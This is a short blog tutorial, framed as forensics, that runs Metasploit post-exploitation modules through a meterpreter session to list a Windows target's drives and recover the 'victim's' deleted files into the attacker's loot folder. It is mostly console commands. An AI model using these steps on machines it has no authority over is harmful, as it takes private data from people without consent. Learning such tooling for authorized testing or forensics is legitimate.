Forensic - File Recovery (Fire With Metasploit)

Hy guy's.. missing me...?
yeah, I think most of you guys looking forward to my post =))
as I promised earlier this year I will be a lot to discuss about forensic. so, go see my writing this time.

Equipment:
1. Metasploit

Note : make sure you get to this stage meterpreter session



The next stage of selecting module "enum_drives". This module will list the physical drives and logical volumes

msf > use post/windows/gather/forensics/enum_drives
msf post(enum_drives) > show options
msf post(enum_drives) > set SESSION 1
msf post(enum_drives) > run


there are multiple logical volumes that look, then I choose the drives "E" for the test module by selecting "recovery_files". This module list and try to recover deleted files from NTFS file systems

msf post(enum_drives) > use post/windows/gather/forensics/recovery_files
msf post(recovery_files) > show options
msf post(recovery_files) > set SESSION 1
msf post(recovery_files) > set DRIVE E:
msf post(recovery_files) > run


seen above there are some files that are recorded on the drive "E". which is where the file has been deleted by the victim. then I took a sample of the file that has been deleted.

msf post(recovery_files) > set files 53248
msf post(recovery_files) > run


success, I managed to get the file and stored in the directory ~/.msf4/loot/

and now, I will take all the files
msf post(recovery_files) > set files 54272,55296,56320,57344,58368
msf post(recovery_files) > run



Complete =))

now.  I will see if the file is still intact or not at all.
command :
# dolphin ~/.msf4/loot/ (for KDE)
or
# nautilus ~/.msf4/loot/ (for Gnome)



Finish :)

Regards
Hidemichi-Hiroyuki a.k.a [H2]

Comments

Popular posts from this blog

Decrypt MD5 $Wordpress

Exploit Samba "SmbClient"

Configure Pure-FTP on Kali Linux